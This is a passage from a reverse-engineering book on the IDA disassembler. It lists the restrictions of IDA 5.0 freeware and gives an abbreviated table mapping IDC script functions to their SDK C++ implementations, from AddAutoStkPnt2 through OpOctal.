In December 2010, Hex-Rays released a sig-

nificant upgrade to its free version of IDA,

moving from version 4.9 to version 5.0. The

freeware version of IDA is a reduced-capability

application that typically lags behind the latest avail-

able version of IDA by several generations and contains

substantially fewer capabilities than the commercial equivalent of the same

version. Thus, not only does the freeware version lack any features introduced

in more recent versions of IDA, it also contains fewer capabilities than the

commercial version of IDA version 5.0.

The intent of this appendix is to provide an overview of the capabilities

of IDA freeware and point out some of the differences in behavior that you

may expect to encounter between the freeware version and the uses of IDA

described throughout this book (which targets the latest commercial version

of IDA). Before getting started, note that Hex-Rays also makes available a

demo version of the latest commercial version of IDA that is reduced in func-

tionality in many of the same ways as the freeware version, with the additional

hindrance that it is not possible to save your work using a demo version of

582 Appendix A

IDA. Also, the demo version will time out at random intervals, requiring

that you restart it (without saving your work!) if you wish to resume the

demonstration.

Restrictions on IDA Freeware

If you wish to use the freeware version of IDA, you must abide by (and, per-

haps, put up with) the following restrictions and reduced functionality:

- The freeware version is for noncommercial use only.
- The freeware version is available only in a Windows GUI version.
- The freeware version lacks all features introduced in later versions of IDA, including all SDK and scripting features that were introduced in versions 5.1 and later.
- On startup, a help file page touting the virtues of the latest version of IDA will be displayed. You can disable this feature for subsequent startups.
- The freeware version ships with substantially fewer plug-ins than the commercial versions.
- The freeware version can disassemble only x86 code (it has only one processor module).
- The freeware version ships with only eight loader modules that cover common x86 file types, including PE, ELF, Mach-O, MS-DOS, COFF, and a.out. Loading files in binary format is also supported.
- The freeware version includes only a few type libraries common to x86 binaries, including those for GNU, Microsoft, and Borland compilers.
- The freeware version ships with significantly fewer IDC scripts, and it ships with no Python scripts because version 5.0 predates the integration of IDAPython.
- Add-ons such as the FLAIR tools and the SDK are not included.
- Debugging is enabled only for local Windows processes/binaries. No remote debugging capability is available.

The look and feel of IDA’s freeware version reflects the look and feel

of all commercial versions. For the features that are present in the freeware

version, the behaviors are similar, if not identical, to the behaviors described

throughout the book regarding the commercial versions of IDA. Thus, IDA

freeware is an excellent way to get acquainted with IDA prior to committing

to a purchase. In noncommercial settings such as academic environments,

IDA freeware offers an outstanding opportunity to learn the basics of dis-

assembly and reverse engineering as long as the restriction to x86 is not a

problem.

Using IDA Freeware

For basic tasks involving x86 disassembly of common file types, IDA freeware

may offer all the capabilities that you require. In particular, IDA 5.0 was the

first version of IDA to incorporate an integrated, graph-based display mode.

This feature alone represents a substantial upgrade over the previous version

of freeware. It is when you find yourself with a need for some of IDA’s more

advanced features that the freeware version begins to come up short. This is

particularly true regarding the creation of FLIRT signatures and the creation

and use of IDA plug-ins. The FLAIR utilities (see Chapter 12) and the IDA

SDK (see Chapter 16) are available only to registered users of commercial

versions of IDA, making it difficult for freeware users to take advantage of

these capabilities.

If you are interested in FLIRT signatures, note that the freeware version

is capable of processing signatures generated by the 4.9 and later versions of

the FLAIR utilities (if you can get your hands on these utilities or have some-

one generate the signatures for you). The SDK is a somewhat different mat-

ter. Even if you manage to locate a copy of version 5.0 of IDA’s SDK, plug-ins

compiled with an unmodified version of the 5.0 SDK are not compatible with

IDA freeware. This is because the freeware utilizes a completely different

method of exporting functions from the core IDA libraries and so requires

a different set of import libraries than are included in the SDK in order to

link properly. This topic has been discussed for previous freeware versions

(specifically IDA 4.9) in various reverse engineering forums.¹ Previous solutions
required a modified SDK, which was not easy to come by. At the time of

this writing, there is no known publicly available means of compiling plug-ins

for IDA 5.0 freeware. Therefore, users hoping to try out various well-known

plug-ins (see Chapter 23) may need to contact the authors of those plug-ins

to see if they have any means of producing binary versions of their plug-ins

that are compatible with IDA freeware.

1. Please see http://www.woodmann.com/forum/showthread.php?t=10756.

IDC/SDK CROSS-REFERENCE

The following table serves to map IDC

scripting functions to their SDK implemen-

tation. The intent of this table is to help pro-

grammers familiar with IDC understand how

similar actions are carried out using SDK functions.

The need for such a table arises for two reasons: (1)

IDC function names do not map cleanly to their SDK

counterparts, and (2) in some cases a single IDC function is composed of sev-

eral SDK actions. This table also exposes some of the ways in which the SDK

utilizes netnodes as a means of storing information into an IDA database. Spe-

cifically, the manner in which netnodes are utilized to implement IDC arrays

becomes evident when we review the IDC array-manipulation functions.

The table attempts to keep SDK descriptions brief. In doing so, error-checking code has been omitted, along with many C++ syntactic elements (notably braces, {}). Many of the SDK functions return results by copying data into caller-supplied buffers. These buffers have been left undeclared for brevity. For consistency, such buffers have been named buf, and their size, in most cases, is assumed to be 1,024 bytes, which is the value of the IDA 6.1 SDK’s MAXSTR constant. Finally, variable declarations have been used only where their use adds to an understanding of the example. Undeclared variables are most frequently the IDC function input parameters as named in the corresponding reference pages within IDA’s built-in help system.
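To make the buffer convention concrete, here is a minimal sketch of the shape that many rows in the table take once the omitted declarations are restored: declare buf, let a getter fill it, then return a heap copy. The getter fake_get_name is a hypothetical stand-in written for this example and is not an SDK function; kMaxStr simply reuses the 1,024-byte figure quoted above, and std::malloc stands in for the SDK's qstrdup.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdio>
#include <cstdlib>
#include <cstring>

// Assumption: mirrors the 1,024-byte MAXSTR value quoted in the text.
const std::size_t kMaxStr = 1024;

// Hypothetical stand-in for an SDK getter that fills a caller-supplied
// buffer. It is not a real SDK function.
void fake_get_name(unsigned long ea, char *buf, std::size_t bufsize) {
    std::snprintf(buf, bufsize, "sub_%lX", ea);
}

// The pattern behind rows of the form "getter(..., buf, sizeof(buf));
// return qstrdup(buf);". The caller owns the result and must free() it.
char *name_at(unsigned long ea) {
    char buf[kMaxStr];                     // the "undeclared" buffer
    fake_get_name(ea, buf, sizeof(buf));   // getter copies its result into buf
    char *copy = static_cast<char *>(std::malloc(std::strlen(buf) + 1));
    if (copy != NULL)
        std::strcpy(copy, buf);            // heap copy outlives the local buffer
    return copy;
}
```

The copy is needed because buf lives on the stack and disappears when the function returns.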

Please keep in mind that IDC has evolved substantially over the years. In its earliest versions, IDC’s primary purpose was to expose some of the more commonly used functionality of the SDK to script programmers. As features have been added to the language, new IDC functions have been added whose sole purpose is to support advanced IDC features, such as objects and exceptions. All IDC functions are ultimately supported by SDK functions, and as a result, in something of a role reversal, new IDC features demanded the addition of new SDK functionality. The latest versions of the SDK now include a number of functions designed to provide the low-level implementation of the IDC object model. In most cases, it is unlikely that users will need to make use of these functions from within compiled modules. One instance where you may find the object manipulation functions useful is when you find yourself developing plug-ins that will extend the IDC language by adding new functions.

IDC Function SDK Implementation

AddAutoStkPnt2 add_auto_stkpnt2(get_func(func_ea), ea, delta);

AddBpt //macro for AddBptEx(ea, 0, BPT_SOFT);

AddBptEx add_bpt(ea, size, bpttype);

AddCodeXref add_cref(From, To, flowtype);

AddConstEx add_const(enum_id, name, value, bmask);

AddEntryPoint add_entry(ordinal, ea, name, makecode);

AddEnum add_enum(idx, name, flag);

AddHotkey add_idc_hotkey(hotkey, idcfunc);

AddSeg segment_t s;

s.startEA = startea;

s.endEA = endea;

s.sel = setup_selector(base);

s.bitness = use32;

s.align = align;

s.comb = comb;

add_segm_ex(&s, NULL, NULL, ADDSEG_NOSREG);

AddSourceFile add_sourcefile(ea1, ea2, filename);

AddStrucEx add_struc(index, name, is_union);

AddStrucMember typeinfo_t mt;

//calls an internal function to initialize mt using typeid

add_struc_member(get_struc(id), name, offset, flag, &mt, nbytes);

AltOp get_forced_operand(ea, n, buf, sizeof(buf));

return qstrdup(buf);

Analysis //macro for SetCharPrm(INF_AUTO, x)

AnalyzeArea analyze_area(sEA, eEA);

Appcall //nargs is the number of arguments following type

//args is idc_value_t[] of args following type

idc_value_t result;

if (type.vtype == VT_LONG && type.num == 0)

appcall(ea, 0, NULL, NULL, nargs, args, &result);

else

idc_value_t tval, fields;

internal_parse_type(&type, &tval, &fields);

appcall(ea, 0, &tval, &fields, nargs, args, &result);

AppendFchunk append_func_tail(get_func(funcea), ea1, ea2);

ApplySig plan_to_apply_idasgn(name);

AskAddr ea_t addr = defval;

askaddr(&addr, "%s", prompt);

return addr;

AskFile return qstrdup(askfile_c(forsave, mask, "%s", prompt));

AskIdent return qstrdup(askident(defval, "%s", prompt));

AskLong sval_t val = defval;

asklong(&val, "%s", prompt);

return val;

AskSeg sel_t seg = defval;

askseg(&seg, "%s", prompt);

return seg;

AskSelector return ask_selector(sel);

AskStr return qstrdup(askstr(HIST_CMT, defval, "%s", prompt));

AskYN return askyn_c(defval, "%s", prompt);

AttachProcess return attach_process(pid, event_id);

AutoMark //macro, see AutoMark2

AutoMark2 auto_mark_range(start, end, queuetype);

AutoShow //macro, see SetCharPrm

AutoUnmark //*** undocumented function

autoUnmark(start, end, type);

Batch ::batch = batch;

BeginEA //macro, see GetLongPrm

BeginTypeUpdating return begin_type_updating(utp);

Byte return get_full_byte(ea);

CanExceptionContinue return get_debug_event()->can_cont;

ChangeConfig internal_change_config(line);

CheckBpt check_bpt(ea);

Checkpoint //*** undocumented function

ChooseFunction return choose_func(ea, -1)->startEA;

CleanupAppcall return cleanup_appcall(0) == 0;

CmtIndent //macro, see SetCharPrm

CommentEx get_cmt(ea, repeatable, buf, sizeof(buf));

return qstrdup(buf);

Comments //macro, see SetCharPrm

Compile //macro for CompileEx(file, 1);

CompileEx if (isfile)

CompileEx(input, CPL_DEL_MACROS | CPL_USE_LABELS,

errbuf, sizeof(errbuf));

else

CompileLineEx(input, errbuf, sizeof(errbuf));

CreateArray qsnprintf(buf, sizeof(buf), "$ idc_array %s", name);

netnode n(buf, 0, true);

return (nodeidx_t)n;

DbgByte if (dbg && (dbg->may_disturb() || get_process_state() < 0))

uint8_t b;

dbg->read_memory(ea, &b, sizeof(b));

return b;

DbgDword if (dbg && (dbg->may_disturb() || get_process_state() < 0))

uint32_t d;

dbg->read_memory(ea, &d, sizeof(d));

return d;

DbgQword if (dbg && (dbg->may_disturb() || get_process_state() < 0))

uint64_t q;

dbg->read_memory(ea, &q, sizeof(q));

return q;

DbgRead if (dbg && (dbg->may_disturb() || get_process_state() < 0))

uint8_t *buf = (uint8_t*) qalloc(len);

dbg->read_memory(ea, buf, len);

return buf;

DbgWord if (dbg && (dbg->may_disturb() || get_process_state() < 0))

uint16_t w;

dbg->read_memory(ea, &w, sizeof(w));

return w;

DbgWrite if (dbg && (dbg->may_disturb() || get_process_state() < 0))

dbg->write_memory(ea, data, length of data);

DecodeInstruction ua_ana0(ea);

return cmd;

DefineException return define_exception(code, name, desc, flags);

DelArrayElement netnode n(id).supdel(idx, tag);

DelBpt del_bpt(ea);

DelCodeXref del_cref(From, To, undef);

DelConstEx del_const(enum_id, value, serial, bmask);

DelEnum del_enum(enum_id);

DelExtLnA netnode n(ea).supdel(n + 1000);

DelExtLnB netnode n(ea).supdel(n + 2000);

DelFixup del_fixup(ea);

DelFunction del_func(ea);

DelHashElement netnode n(id);

n.hashdel(idx);

DelHiddenArea del_hidden_area(ea);

DelHotkey del_idc_hotkey(hotkey);

DelLineNumber del_source_linnum(ea);

DelSeg del_segm(ea, flags);

DelSelector del_selector(sel);

DelSourceFile del_sourcefile(ea);

DelStkPnt del_stkpnt(get_func(func_ea), ea);

DelStruc del_struc(get_struc(id));

DelStrucMember del_struc_member(get_struc(id), offset);

DelXML del_xml(path);

DeleteAll while (get_segm_qty())

del_segm(getnseg(0), 0);

FlagsDisable(0, inf.ominEA);

FlagsDisable(inf.omaxEA, 0xFFFFFFFF);

DeleteArray netnode n(id).kill();

Demangle demangle_name(buf, sizeof(buf), name, disable_mask);

return qstrdup(buf);

DetachProcess detach_process();

Dfirst return get_first_dref_from(From);

DfirstB return get_first_dref_to(To);

Dnext return get_next_dref_from(From, current);

DnextB return get_next_dref_to(To, current);

Dword return get_full_long(ea);

EnableBpt enable_bpt(ea, enable);

EnableTracing if (trace_level == 0)

return enable_step_trace(enable);

else if (trace_level == 1)

return enable_insn_trace(enable);

else if (trace_level == 2)

return enable_func_trace(enable);

EndTypeUpdating end_type_updating(utp);

Eval idc_value_t v;

calcexpr(-1, expr, &v, errbuf, sizeof(errbuf));

Exec call_system(command);

ExecIDC char fname[16];

uint32_t fnum = globalCount++; //mutex around globalCount

qsnprintf(fname, sizeof(fname), "___idcexec%d", fnum);

uint32_t len;

len = qsnprintf(NULL, 0, "static %s() {\n%s\n; }", fname, input);

char *func = (char*)qalloc(len);

qsnprintf(func, len, "static %s() {\n%s\n; }", fname, input);

ExecuteLine(func, fname, NULL, 0, NULL, NULL, err, sizeof(err));

globalCount--; //mutex around globalCount

qfree(func);

Exit qexit(code);

ExtLinA netnode n(ea).supset(n + 1000, line);

setFlbits(ea, FF_LINE);

ExtLinB netnode n(ea).supset(n + 2000, line);

setFlbits(ea, FF_LINE);

Fatal error(format, ...);

FindBinary ea_t endea = (flag & SEARCH_DOWN) ? inf.maxEA : inf.minEA;

return find_binary(ea, endea, str, getDefaultRadix(), flag);

FindCode return find_code(ea, flag);

FindData return find_data(ea, flag);

FindExplored return find_defined(ea, flag);

FindFuncEnd func_t f;

find_func_bounds(ea, &f, FIND_FUNC_DEFINE);

return f.endEA;

FindImmediate return find_imm(ea, flag, value);

FindSelector return find_selector(val);

FindText return find_text(ea, y, x, str, flag);

FindUnexplored return find_unknown(ea, flag);

FindVoid return find_void(ea, flag);

FirstFuncFchunk get_func(funcea)->startEA;

FirstSeg return getnseg(0)->startEA;

ForgetException excvec_t *ev = retrieve_exceptions();

for (excvec_t::iterator i = ev->begin(); i != ev->end(); i++)

if ((*i).code == code)

ev->erase(i);

return store_exceptions();

return 0;

GenCallGdl gen_simple_call_chart(outfile, "Building graph", title, flags);

GenFuncGdl func_t *f = get_func(ea1);

gen_flow_graph(outfile, title, f, ea1, ea2, flags);

GenerateFile gen_file(type, file_handle, ea1, ea2, flags);

GetArrayElement netnode n(id);

if (tag == 'A') return n.altval(idx);

else if (tag == 'S')

n.supstr(idx, buf, sizeof(buf));

return qstrdup(buf);

GetArrayId qsnprintf(buf, sizeof(buf), "$ idc_array %s", name);

netnode n(buf);

return (nodeidx_t)n;

GetBmaskCmt get_bmask_cmt(enum_id, bmask, repeatable, buf, sizeof(buf));

return qstrdup(buf);

GetBmaskName get_bmask_name(enum_id, bmask, buf, sizeof(buf));

return qstrdup(buf);

GetBptAttr bpt_t bpt;

if (get_bpt(ea, &bpt) == 0) return -1;

if (bpattr == BPTATTR_EA) return bpt.ea;

else if (bpattr == BPTATTR_SIZE) return bpt.size;

else if (bpattr == BPTATTR_TYPE) return bpt.type;

else if (bpattr == BPTATTR_COUNT) return bpt.pass_count;

else if (bpattr == BPTATTR_FLAGS) return bpt.flags;

else if (bpattr == BPTATTR_COND) return qstrdup(bpt.condition);

GetBptEA bpt_t bpt;

return getn_bpt(n, &bpt) ? bpt.ea : -1;

GetBptQty return get_bpt_qty();

GetCharPrm if (offset <= 191)

return *(unsigned char*)(offset + (char*)&inf);

GetColor if (what == CIC_ITEM)

return get_color(ea);

else if (what == CIC_FUNC)

return get_func(ea)->color;

else if (what == CIC_SEGM)

return get_seg(ea)->color;

return 0xFFFFFFFF;

GetConstBmask return get_const_bmask(const_id);

GetConstByName return get_const_by_name(name);

GetConstCmt get_const_cmt(const_id, repeatable, buf, sizeof(buf));

return qstrdup(buf);

GetConstEnum return get_const_enum(const_id);

GetConstEx return get_const(enum_id, value, serial, bmask);

GetConstName get_const_name(const_id, buf, sizeof(buf));

return qstrdup(buf);

GetConstValue return get_const_value(const_id);

GetCurrentLine tag_remove(get_curline(), buf, sizeof(buf));

return qstrdup(buf);

GetCurrentThreadId return get_current_thread();

GetCustomDataFormat return find_custom_data_format(name);

GetCustomDataType return find_custom_data_type(name);

GetDebuggerEvent return wait_for_next_event(wfne, timeout);

GetDisasm generate_disasm_line(ea, buf, sizeof(buf));

tag_remove(buf, buf, 0);

return qstrdup(buf);

GetEntryName get_entry_name(ordinal, buf, sizeof(buf));

return qstrdup(buf);

GetEntryOrdinal return get_entry_ordinal(index);

GetEntryPoint return get_entry(ordinal);

GetEntryPointQty return get_entry_qty();

GetEnum return get_enum(name);

GetEnumCmt get_enum_cmt(enum_id, repeatable, buf, sizeof(buf));

return qstrdup(buf);

GetEnumFlag return get_enum_flag(enum_id);

GetEnumIdx return get_enum_idx(enum_id);

GetEnumName get_enum_name(enum_id, buf, sizeof(buf));

return qstrdup(buf);

GetEnumQty return get_enum_qty();

GetEnumSize return get_enum_size(enum_id);

GetEnumWidth if (enum_id > 0xff000000)

netnode n(enum_id);

return (n.altval(0xfffffffb) >> 3) & 7;

else

return 0;

GetEventBptHardwareEa return get_debug_event()->bpt.hea;

GetEventEa return get_debug_event()->ea;

GetEventExceptionCode return get_debug_event()->exc.code;

GetEventExceptionEa return get_debug_event()->exc.ea;

GetEventExceptionInfo return qstrdup(get_debug_event()->exc.info);

GetEventExitCode return get_debug_event()->exit_code;

GetEventId return get_debug_event()->eid;

GetEventInfo return qstrdup(get_debug_event()->info);

GetEventModuleBase return get_debug_event()->modinfo.base;

GetEventModuleName return qstrdup(get_debug_event()->modinfo.name);

GetEventModuleSize return get_debug_event()->modinfo.size;

GetEventPid return get_debug_event()->pid;

GetEventTid return get_debug_event()->tid;

GetExceptionCode excvec_t *ev = retrieve_exceptions();

return idx < ev->size() ? (*ev)[idx].code : 0;

GetExceptionFlags excvec_t *ev = retrieve_exceptions();

for (excvec_t::iterator i = ev->begin(); i != ev->end(); i++)

if ((*i).code == code)

return (*i).flags;

return -1;

GetExceptionName excvec_t *ev = retrieve_exceptions();

for (excvec_t::iterator i = ev->begin(); i != ev->end(); i++)

if ((*i).code == code)

return new qstring((*i).name);

return NULL;

GetExceptionQty return retrieve_exceptions()->size();

GetFchunkAttr func_t *f = get_func(ea);

return internal_get_attr(f, attr);

GetFchunkReferer func_t *f = get_fchunk(ea);

func_parent_iterator_t fpi(f);

return n < f->refqty ? f->referers[n] : BADADDR;

GetFirstBmask return get_first_bmask(enum_id);

GetFirstConst return get_first_const(enum_id, bmask);

GetFirstHashKey netnode n(id).hash1st(buf, sizeof(buf));

return qstrdup(buf);

GetFirstIndex return netnode n(id).sup1st(tag);

GetFirstMember return get_struc_first_offset(get_struc(id));

GetFirstModule module_info_t modinfo;

get_first_module(&modinfo);

return modinfo.base;

GetFirstStrucIdx return get_first_struc_idx();

GetFixupTgtDispl fixup_data_t fd;

get_fixup(ea, &fd);

return fd.displacement;

GetFixupTgtOff fixup_data_t fd;

get_fixup(ea, &fd);

return fd.off;

GetFixupTgtSel fixup_data_t fd;

get_fixup(ea, &fd);

return fd.sel;

GetFixupTgtType fixup_data_t fd;

get_fixup(ea, &fd);

return fd.type;

GetFlags getFlags(ea);

GetFpNum //*** undocumented function

char buf[16];

union {float f; double d; long double ld;} val;

get_many_bytes(ea, buf, len > 16 ? 16 : len);

ph.realcvt(buf, &val, (len >> 1) - 1);

return val;

GetFrame //macro, see GetFunctionAttr

GetFrameArgsSize //macro, see GetFunctionAttr

GetFrameLvarSize //macro, see GetFunctionAttr

GetFrameRegsSize //macro, see GetFunctionAttr

GetFrameSize return get_frame_size(get_func(ea));

GetFuncOffset int flags = GNCN_REQFUNC | GNCN_NOCOLOR;

get_nice_colored_name(ea, buf, sizeof(buf), flags);

return qstrdup(buf);

GetFunctionAttr func_t *f = get_func(ea);

return internal_get_attr(f, attr);

GetFunctionCmt return get_func_cmt(get_func(ea), repeatable);

GetFunctionFlags //macro, see GetFunctionAttr

GetFunctionName get_func_name(ea, buf, sizeof(buf));

return qstrdup(buf);

GetHashLong netnode n(id).hashval_long(idx);

GetHashString netnode n(id).hashval(idx, buf, sizeof(buf));

return qstrdup(buf);

GetIdaDirectory qstrncpy(buf, idadir(NULL), sizeof(buf));

return qstrdup(buf);

GetIdbPath qstrncpy(buf, database_idb, sizeof(buf));

return qstrdup(buf);

GetInputFile get_root_filename(buf, sizeof(buf));

return qstrdup(buf);

GetInputFilePath RootNode.valstr(buf, sizeof(buf));

return qstrdup(buf);

GetInputMD5 uint8_t md5bin[16];

char out[1024];

char *outp = out;

int len = sizeof(out);

out[0] = 0;

RootNode.supval(RIDX_MD5, md5bin, sizeof(md5bin));

for (int j = 0; j < sizeof(md5bin); j++) {

int nbytes = qsnprintf(outp, len, "%02X", md5bin[j]);

outp += nbytes;

len -= nbytes;

}

return qstrdup(out);

GetLastBmask return get_last_bmask(enum_id);

GetLastConst return get_last_const(enum_id, bmask);

GetLastHashKey netnode n(id).hashlast(buf, sizeof(buf));

return qstrdup(buf);

GetLastIndex return netnode n(id).suplast(tag);

GetLastMember return get_struc_last_offset(get_struc(id));

GetLastStrucIdx return get_last_struc_idx();

GetLineNumber return get_source_linnum(ea);

GetLocalType const type_t *type;

const p_list *fields;

get_numbered_type(idati, ordinal, &type, &fields,

NULL, NULL, NULL);

char *name = get_numbered_type_name(idati, ordinal);

qstring res;

print_type_to_qstring(&res, 0, 2, 40, flags, idati, type,

name, NULL, fields, NULL);

return qstrdup(res.c_str());

GetLocalTypeName return qstrdup(get_numbered_type_name(idati, ordinal));

GetLongPrm if (offset <= 188)

return *(int*)(offset + (char*)&inf);

GetManualInsn get_manual_insn(ea, buf, sizeof(buf));

return qstrdup(buf);

GetManyBytes uint8_t *out = (uint8_t*)qalloc(size + 1);

if (use_dbg)

if (dbg && (dbg->may_disturb() || get_process_state() < 0))

dbg->read_memory(ea, out, size);

else

qfree(out);

out = NULL;

else

get_many_bytes(ea, out, size);

return out;

GetMarkComment curloc loc.markdesc(slot, buf, sizeof(buf));

return qstrdup(buf);

GetMarkedPos return curloc loc.markedpos(&slot);

GetMaxLocalType return get_ordinal_qty(idati);

GetMemberComment tid_t m = get_member(get_struc(id), offset)->id;

netnode n(m).supstr(repeatable ? 1 : 0, buf, sizeof(buf));

return qstrdup(buf);

GetMemberFlag return get_member(get_struc(id), offset)->flag;

GetMemberName tid_t m = get_member(get_struc(id), offset)->id;

get_member_name(m, buf, sizeof(buf));

return qstrdup(buf);

GetMemberOffset return get_member_by_name(get_struc(id), member_name)->soff;

GetMemberQty get_struc(id)->memqty;

GetMemberSize member_t *m = get_member(get_struc(id), offset);

return get_member_size(m);

GetMemberStrId tid_t m = get_member(get_struc(id), offset)->id;

return netnode n(m).altval(3) - 1;

GetMinSpd func_t *f = get_func(ea);

return f ? get_min_spd_ea(f) : BADADDR;

GetMnem ua_mnem(ea, buf, sizeof(buf));

return qstrdup(buf);

GetModuleName module_info_t modinfo;

if (base == 0)

get_first_module(&modinfo);

else

modinfo.base = base - 1;

get_next_module(&modinfo);

return qstrdup(modinfo.name);

GetModuleSize module_info_t modinfo;

if (base == 0)

get_first_module(&modinfo);

else

modinfo.base = base - 1;

get_next_module(&modinfo);

return modinfo.size;

GetNextBmask return get_next_bmask(enum_id, value);

GetNextConst return get_next_const(enum_id, value, bmask);

GetNextFixupEA return get_next_fixup_ea(ea);

GetNextHashKey netnode n(id).hashnxt(idx, buf, sizeof(buf));

return qstrdup(buf);

GetNextIndex return netnode n(id).supnxt(idx, tag);

GetNextModule module_info_t modinfo;

modinfo.base = base;

get_next_module(&modinfo);

return modinfo.base;

GetNextStrucIdx return get_next_struc_idx(index);

GetOpType *buf = 0;

if (isCode(get_flags_novalue(ea)))

ua_ana0(ea);

return cmd.Operands[n].type;

GetOperandValue Use ua_ana0 to fill command struct then return

appropriate value based on cmd.Operands[n].type

GetOpnd *buf = 0;

if (isCode(get_flags_novalue(ea)))

ua_outop2(ea, buf, sizeof(buf), n);

tag_remove(buf, buf, sizeof(buf));

return qstrdup(buf);

GetOriginalByte return get_original_byte(ea);

GetPrevBmask return get_prev_bmask(enum_id, value);

GetPrevConst return get_prev_const(enum_id, value, bmask);

GetPrevFixupEA return get_prev_fixup_ea(ea);

GetPrevHashKey netnode n(id).hashprev(idx, buf, sizeof(buf));

return qstrdup(buf);

GetPrevIndex return netnode n(id).supprev(idx, tag);

GetPrevStrucIdx return get_prev_struc_idx(index);

GetProcessName process_info_t p;

pid_t pid = get_process_info(idx, &p);

return qstrdup(p.name);

GetProcessPid return get_process_info(idx, NULL);

GetProcessQty return get_process_qty();

GetProcessState return get_process_state();

GetReg return getSR(ea, str2reg(reg));

GetRegValue regval_t r;

get_reg_val(name, &r);

if (is_reg_integer(name))

return (int)r.ival;

else

//memcpy(result, r.fval, 12);

GetSegmentAttr segment_t *s = get_seg(segea);

return internal_get_attr(s, attr);

GetShortPrm if (offset <= 190)

return *(unsigned short*)(offset + (char*)&inf);

GetSourceFile return qstrdup(get_sourcefile(ea));

GetSpDiff return get_sp_delta(get_func(ea), ea);

GetSpd return get_spd(get_func(ea), ea);

GetString if (len == -1)

len = get_max_ascii_length(ea, type, true);

get_ascii_contents(ea, len, type, buf, sizeof(buf));

return qstrdup(buf);

GetStringType return netnode n(ea).altval(16) - 1;

GetStrucComment get_struc_cmt(id, repeatable, buf, sizeof(buf));

return qstrdup(buf);

GetStrucId return get_struc_by_idx(index);

GetStrucIdByName return get_struc_id(name);

GetStrucIdx return get_struc_idx(id);

GetStrucName get_struc_name(id, buf, sizeof(buf));

return qstrdup(buf);

GetStrucNextOff return get_struc_next_offset(get_struc(id), offset);

GetStrucPrevOff return get_struc_prev_offset(get_struc(id), offset);

GetStrucQty return get_struc_qty();

GetStrucSize return get_struc_size(id);

GetTestId //*** undocumented, returns internal testId

GetThreadId return getn_thread(idx);

GetThreadQty return get_thread_qty();

GetTinfo //no comparable return type in SDK, generally uses get_tinfo

GetTrueName //macro, see GetTrueNameEx

GetTrueNameEx return qstrdup(get_true_name(from, ea, buf, sizeof(buf)));

GetType get_ti(ea, tbuf, sizeof(tbuf), plist, sizeof(plist));

print_type_to_one_line(buf, sizeof(buf), idati,

tbuf, NULL, NULL, plist, NULL);

return qstrdup(buf);

GetnEnum return getn_enum(idx);

GetVxdFuncName //*** undocumented function

get_vxd_func_name(vxdnum, funcnum, buf, sizeof(buf));

return qstrdup(buf);

GetXML valut_t res;

get_xml(path, &res);

return res;

GuessType guess_type(ea, tbuf, sizeof(tbuf), plist, sizeof(plist));

print_type_to_one_line(buf, sizeof(buf), idati, tbuf,

NULL, NULL, plist, NULL);

return qstrdup(buf);

HideArea add_hidden_area(start, end, description, header, footer, color);

HighVoids //macro, see SetLongPrm

IdbByte return get_db_byte(ea);

Indent //macro, see SetCharPrm

IsBitfield return is_bf(enum_id);

IsEventHandled return get_debug_event()->handled;

IsFloat //IDC variable type query, n/a for SDK

IsLong //IDC variable type query, n/a for SDK

IsObject //IDC variable type query, n/a for SDK

IsString //IDC variable type query, n/a for SDK

IsUnion return get_struc(id)->is_union();

ItemEnd return get_item_end(ea);

ItemHead return get_item_head(ea);

ItemSize return get_item_end(ea) - ea;

Jump jumpto(ea);

LineA netnode n(ea).supstr(1000 + num, buf, sizeof(buf));

return qstrdup(buf);

LineB netnode n(ea).supstr(2000 + num, buf, sizeof(buf));

return qstrdup(buf);

LoadDebugger load_debugger(dbgname, use_remote);

LoadTil return add_til2(name, 0);

LocByName return get_name_ea(-1, name);

LocByNameEx return get_name_ea(from, name);

LowVoids //macro, see SetLongPrm

MK_FP return ((seg<<4) + off);

MakeAlign doAlign(ea, count, align);

MakeArray typeinfo_t ti;

flags_t f = get_flags_novalue(ea);

get_typeinfo(ea, 0, f, &ti);

asize_t sz = get_data_elsize(ea, f, &ti);

do_data_ex(ea, f, sz * nitems, ti.tid);

MakeByte //macro, see MakeData

MakeCode ua_code(ea);

MakeComm set_cmt(ea, cmt, false);

MakeData do_data_ex(ea, flags, size, tid);

MakeDouble //macro, see MakeData

MakeDword //macro, see MakeData

MakeFloat //macro, see MakeData

MakeFrame func_t *f = get_func(ea);

set_frame_size(f, lvsize, frregs, argsize);

return f->frame;

MakeFunction add_func(start, end);

MakeLocal func_t *f = get_func(ea);

if (*location != '[')

add_regvar(f, start, end, location, name, NULL);

else

struc_t *fr = get_frame(f);

int start = f->frsize + offset;

if (get_member(fr, start))

set_member_name(fr, start, name);

else

add_struc_member(fr, name, start, 0x400, 0, 1);

MakeNameEx set_name(ea, name, flags);

MakeOword //macro, see MakeData

MakePackReal //macro, see MakeData

MakeQword //macro, see MakeData

MakeRptCmt set_cmt(ea, cmt, true);

MakeStr int len = endea == -1 ? 0 : endea - ea;

make_ascii_string(ea, len, current_string_type);

MakeStructEx netnode n(strname);

nodeidx_t idx = (nodeidx_t)n;

if (size != -1)

do_data_ex(ea, FF_STRU, size, idx);

else

size_t sz = get_struc_size(get_struc(idx));

do_data_ex(ea, FF_STRU, sz, idx);

MakeTbyte //macro, see MakeData

MakeUnkn do_unknown(ea, flags);

MakeUnknown do_unknown_range(ea, size, flags);

MakeVar doVar(ea);

MakeWord //macro, see MakeData

MarkPosition curloc loc;

loc.ea = ea; loc.lnnum = lnnum; loc.x = x; loc.y = y;

loc.mark(slot, NULL, comment);

MaxEA //macro, see GetLongPrm

Message msg(format, ...);

MinEA //macro, see GetLongPrm

MoveSegm return move_segm(get_seg(ea), to, flags);

Name return qstrdup(get_name(-1, ea, buf, sizeof(buf)));

NameEx return qstrdup(get_name(from, ea, buf, sizeof(buf)));

NextAddr return nextaddr(ea);

NextFchunk return funcs->getn_area(funcs->get_next_area(ea))->startEA;

NextFuncFchunk func_tail_iterator_t fti(get_func(funcea), tailea);

return fti.next() ? fti.chunk().startEA : -1;

NextFunction return get_next_func(ea)->startEA;

NextHead return next_head(ea, maxea);

NextNotTail return next_not_tail(ea);

NextSeg int n = segs.get_next_area(ea);

return getnseg(n)->startEA;

OpAlt set_forced_operand(ea, n, str);

OpBinary op_bin(ea, n);

OpChr op_chr(ea, n);

OpDecimal op_dec(ea, n);

OpEnumEx op_enum(ea, n, enumid, serial);

OpFloat op_flt(ea, n);

OpHex op_hex(ea, n);

OpHigh return op_offset(ea, n, REF_HIGH16, target);

OpNot toggle_bnot(ea, n);

OpNumber op_num(ea, n);

OpOctal op_oct(ea, n);

